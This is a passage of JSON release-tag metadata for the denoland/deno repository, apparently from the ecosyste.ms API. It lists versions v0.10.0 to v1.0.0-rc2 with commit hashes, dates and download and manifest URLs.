ithub.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.